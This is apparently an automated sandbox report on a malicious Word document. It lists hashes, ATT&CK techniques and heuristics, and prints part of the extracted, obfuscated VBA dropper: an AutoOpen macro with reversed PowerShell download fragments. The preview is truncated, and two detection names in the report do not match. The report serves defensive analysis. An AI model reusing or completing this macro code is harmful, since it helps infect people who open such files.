Office (OLE) malware analysis — malicious · 781c958e522ee47e

MALICIOUS

Office (OLE)

130.5 KB Created: 2018-05-02 14:10:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 4db375da7ec7d8c4ccfced0ff410ebff SHA-1: 1470f8d195993adb8458c14cc84ce8b7904c2bb8 SHA-256: 781c958e522ee47e9a2014c74641c89dc4bae593fcc43cd5ca461cf1896f0fa3

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, which is commonly used to download and execute secondary payloads. The 'Autoopen' macro marker suggests automatic execution upon opening. The ClamAV detection name 'Doc.Dropper.Agent-6527696-0' further supports its nature as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6527591-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6527591-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 121912 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	121912 bytes
SHA-256: `4dcf03147eb000eba460dfc3aae067aa176f119d116dcbb9f447e9b228efec05`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "rzAFDBQs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub aujzGD(JlCZC) Rqvjlz = 53564 * CByte(miJDlj) zjrpOw = Int(44359) - Oct(11422 - 42224 * uMmYo) BuIQQ = 15088 * CByte(DRUMo) End Sub Sub avVXY(CKjok) kZcrlp = 17927 * CByte(XHJcQR) KnYuki = Int(80774) - Oct(91575 - 15361 * pOMmw) GYWfi = 92485 * CByte(jfDqs) msHGX = 83346 * CByte(LuALu) URwawL = Int(50973) - Oct(78533 - 6064 * tlGOa) OjszcV = 63984 * CByte(IpvYHL) LlEbv = 68774 * CByte(GfSij) NUQczT = Int(60615) - Oct(37296 - 36209 * BzkORH) Bhrfi = 173 * CByte(nfIJa) End Sub Sub iwlsU(ZSbojF) oDcLVn = 98112 * CByte(QwsIf) OpSKW = Int(86391) - Oct(11415 - 35480 * Nrtdi) atKapL = 97059 * CByte(TmWbz) BtkoT = 21783 * CByte(JdKMmW) OUbJR = Int(35869) - Oct(82068 - 6647 * ipIPiw) zRIEA = 39672 * CByte(EJWTQ) End Sub Sub Autoopen() On Error Resume Next AOCpz = 93180 * CByte(LMKiXw) CwKvz = Int(22062) - Oct(10404 - 20367 * dRAtNW) uzanhT = 75009 * CByte(ShwMn) DXjkSYi (ihCJE + LIjSwjVROtzdG + zaUEK) TZXzCm = 77498 * CByte(QfzKi) LrdRNs = Int(45152) - Oct(76162 - 99161 * wkIQAT) VdrzNv = 40697 * CByte(LYaqwk) End Sub Sub iWuHzC(RSjZnw) iXMwA = 53403 * CByte(niwvIm) TzwAA = Int(12523) - Oct(12243 - 72987 * sWbdL) ToIWN = 64180 * CByte(NuwIK) nvLoQq = 96273 * CByte(jYmsL) ATaYwV = Int(28138) - Oct(28985 - 18877 * mYUSkC) swPwa = 63855 * CByte(LnNDkP) dCoAt = 37986 * CByte(KocYm) CrWfk = Int(63773) - Oct(42765 - 89784 * wuZmtN) IKfuR = 16124 * CByte(fSqid) End Sub Sub ImZoIi(QhSCt) hGuaHa = 23002 * CByte(fRtrGu) rNuwt = Int(24214) - Oct(76763 - 17991 * ldOtu) scBqaQ = 69600 * CByte(iIRjcV) End Sub Attribute VB_Name = "wBkwZUYEAOt" Sub apdMRE(ZRqQT) HVMqb = 56206 * CByte(ooobi) VFTXBc = Int(63025) - Oct(37858 - 18983 * EwzfX) OGlQtS = 98195 * CByte(NYliI) End Sub Function LIjSwjVROtzdG() On Error Resume Next isaHdb = 46833 * CByte(vOHYWd) shLwb = Int(18442) - Oct(29599 - 25231 * qRwfZ) SozkK = 22176 * CByte(wrIAU) bPwwNM = MBuHnU("N6X4rRahC[(EcAlPEr-63]J8Dl", 41506 - 41506 + 5 + 41506 - 41506, 41506 - 41506 + 17 + 41506 - 41506) qppUOz = 19908 * CByte(sfsZTi) RLdtW = Int(47838) - Oct(93302 - 37038 * lTsjk) nbpjX = 65077 * CByte(zkfPk) SuHvi = 69597 * CByte(tRiJiA) oWEUs = Int(58884) - Oct(98526 - 46925 * ipYUbz) GwpGXi = 56410 * CByte(Thshmu) MSHfwYop = MBuHnU("uo9jQclbup'+':'+'vn'+'eNYX '+'= CDS'+'NYX;'+')h'+'EZ@hEZ'+'(tilpS.hEZ'+'/32'+'Xrtx'+'K/ed'+'.sno'+'itaerc'+'43", 49469 - 49469 + 2 + 49469 - 49469, 49469 - 49469 + 103 + 49469 - 49469) kQkFVS = 3328 * CByte(RItGZ) JPUuR = Int(44655) - Oct(21527 - 78732 * fJsPBK) RlsDEH = 69699 * CByte(ihFiY) IQSNs = 85940 * CByte(sQzZNG) MXqja = Int(12028) - Oct(27 - 69845 * oGfPz) KcOOIz = 8766 * CByte(tdRwpq) Uruqr = MBuHnU("a3zr8hC[+221]RahC[( ecALperC- 93]RahC[,'hEZ' EcAlPEr- )'}}'+'{hcta'+'c};'+'ka'+'erb;)'+'CDS'+'N'1Es", 94931 - 94931 + 4 + 94931 - 94931, 94931 - 94931 + 91 + 94931 - 94931) zJdsaI = 69498 * CByte(khVXI) GMcoOG = Int(44965) - Oct(21933 - 98510 * PHwzCJ) KtVoz = 3746 * CByte(XUaFd) iGWZVh = 80431 * CByte(oKLls) fIjvEr = Int(61814) - Oct(58565 - 72084 * FDJtu) IwvLDv = 74779 * CByte(YbRIS) HrkXQ = MBuHnU("qN5A ))43]RahC[,)94]RahC[+211]RahC[+17]RahC[(EcAlPEr-29]RahC[,)901]RahC[+94]RahC[+89]RqW%", 64385 - 64385 + 5 + 64385 - 64385, 64385 - 64385 + 81 + 64385 - 64385) fuNRa = 70207 * CByte(qCVwDV) USXwa = Int(80679) - Oct(3980 - 24 ... (truncated)

SHA-256: 4dcf03147eb000eba460dfc3aae067aa176f119d116dcbb9f447e9b228efec05

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "rzAFDBQs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aujzGD(JlCZC)
Rqvjlz = 53564 * CByte(miJDlj)
            zjrpOw = Int(44359) - Oct(11422 - 42224 * uMmYo)
            BuIQQ = 15088 * CByte(DRUMo)
End Sub
Sub avVXY(CKjok)
kZcrlp = 17927 * CByte(XHJcQR)
            KnYuki = Int(80774) - Oct(91575 - 15361 * pOMmw)
            GYWfi = 92485 * CByte(jfDqs)
msHGX = 83346 * CByte(LuALu)
            URwawL = Int(50973) - Oct(78533 - 6064 * tlGOa)
            OjszcV = 63984 * CByte(IpvYHL)
LlEbv = 68774 * CByte(GfSij)
            NUQczT = Int(60615) - Oct(37296 - 36209 * BzkORH)
            Bhrfi = 173 * CByte(nfIJa)
End Sub
Sub iwlsU(ZSbojF)
oDcLVn = 98112 * CByte(QwsIf)
            OpSKW = Int(86391) - Oct(11415 - 35480 * Nrtdi)
            atKapL = 97059 * CByte(TmWbz)
BtkoT = 21783 * CByte(JdKMmW)
            OUbJR = Int(35869) - Oct(82068 - 6647 * ipIPiw)
            zRIEA = 39672 * CByte(EJWTQ)
End Sub
Sub Autoopen()
On Error Resume Next
AOCpz = 93180 * CByte(LMKiXw)
            CwKvz = Int(22062) - Oct(10404 - 20367 * dRAtNW)
            uzanhT = 75009 * CByte(ShwMn)
DXjkSYi (ihCJE + LIjSwjVROtzdG + zaUEK)
TZXzCm = 77498 * CByte(QfzKi)
            LrdRNs = Int(45152) - Oct(76162 - 99161 * wkIQAT)
            VdrzNv = 40697 * CByte(LYaqwk)
End Sub
Sub iWuHzC(RSjZnw)
iXMwA = 53403 * CByte(niwvIm)
            TzwAA = Int(12523) - Oct(12243 - 72987 * sWbdL)
            ToIWN = 64180 * CByte(NuwIK)
nvLoQq = 96273 * CByte(jYmsL)
            ATaYwV = Int(28138) - Oct(28985 - 18877 * mYUSkC)
            swPwa = 63855 * CByte(LnNDkP)
dCoAt = 37986 * CByte(KocYm)
            CrWfk = Int(63773) - Oct(42765 - 89784 * wuZmtN)
            IKfuR = 16124 * CByte(fSqid)
End Sub
Sub ImZoIi(QhSCt)
hGuaHa = 23002 * CByte(fRtrGu)
            rNuwt = Int(24214) - Oct(76763 - 17991 * ldOtu)
            scBqaQ = 69600 * CByte(iIRjcV)
End Sub

Attribute VB_Name = "wBkwZUYEAOt"
Sub apdMRE(ZRqQT)
HVMqb = 56206 * CByte(ooobi)
            VFTXBc = Int(63025) - Oct(37858 - 18983 * EwzfX)
            OGlQtS = 98195 * CByte(NYliI)
End Sub
Function LIjSwjVROtzdG()
On Error Resume Next
isaHdb = 46833 * CByte(vOHYWd)
            shLwb = Int(18442) - Oct(29599 - 25231 * qRwfZ)
            SozkK = 22176 * CByte(wrIAU)
bPwwNM = MBuHnU("N6X4rRahC[(EcAlPEr-63]J8Dl", 41506 - 41506 + 5 + 41506 - 41506, 41506 - 41506 + 17 + 41506 - 41506)
qppUOz = 19908 * CByte(sfsZTi)
            RLdtW = Int(47838) - Oct(93302 - 37038 * lTsjk)
            nbpjX = 65077 * CByte(zkfPk)
SuHvi = 69597 * CByte(tRiJiA)
            oWEUs = Int(58884) - Oct(98526 - 46925 * ipYUbz)
            GwpGXi = 56410 * CByte(Thshmu)
MSHfwYop = MBuHnU("uo9jQclbup'+':'+'vn'+'eNYX '+'= CDS'+'NYX;'+')h'+'EZ@hEZ'+'(tilpS.hEZ'+'/32'+'Xrtx'+'K/ed'+'.sno'+'itaerc'+'43", 49469 - 49469 + 2 + 49469 - 49469, 49469 - 49469 + 103 + 49469 - 49469)
kQkFVS = 3328 * CByte(RItGZ)
            JPUuR = Int(44655) - Oct(21527 - 78732 * fJsPBK)
            RlsDEH = 69699 * CByte(ihFiY)
IQSNs = 85940 * CByte(sQzZNG)
            MXqja = Int(12028) - Oct(27 - 69845 * oGfPz)
            KcOOIz = 8766 * CByte(tdRwpq)
Uruqr = MBuHnU("a3zr8hC[+221]RahC[( ecALperC- 93]RahC[,'hEZ' EcAlPEr- )'}}'+'{hcta'+'c};'+'ka'+'erb;)'+'CDS'+'N'1Es", 94931 - 94931 + 4 + 94931 - 94931, 94931 - 94931 + 91 + 94931 - 94931)
zJdsaI = 69498 * CByte(khVXI)
            GMcoOG = Int(44965) - Oct(21933 - 98510 * PHwzCJ)
            KtVoz = 3746 * CByte(XUaFd)
iGWZVh = 80431 * CByte(oKLls)
            fIjvEr = Int(61814) - Oct(58565 - 72084 * FDJtu)
            IwvLDv = 74779 * CByte(YbRIS)
HrkXQ = MBuHnU("qN5A ))43]RahC[,)94]RahC[+211]RahC[+17]RahC[(EcAlPEr-29]RahC[,)901]RahC[+94]RahC[+89]RqW%", 64385 - 64385 + 5 + 64385 - 64385, 64385 - 64385 + 81 + 64385 - 64385)
fuNRa = 70207 * CByte(qCVwDV)
            USXwa = Int(80679) - Oct(3980 - 24
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.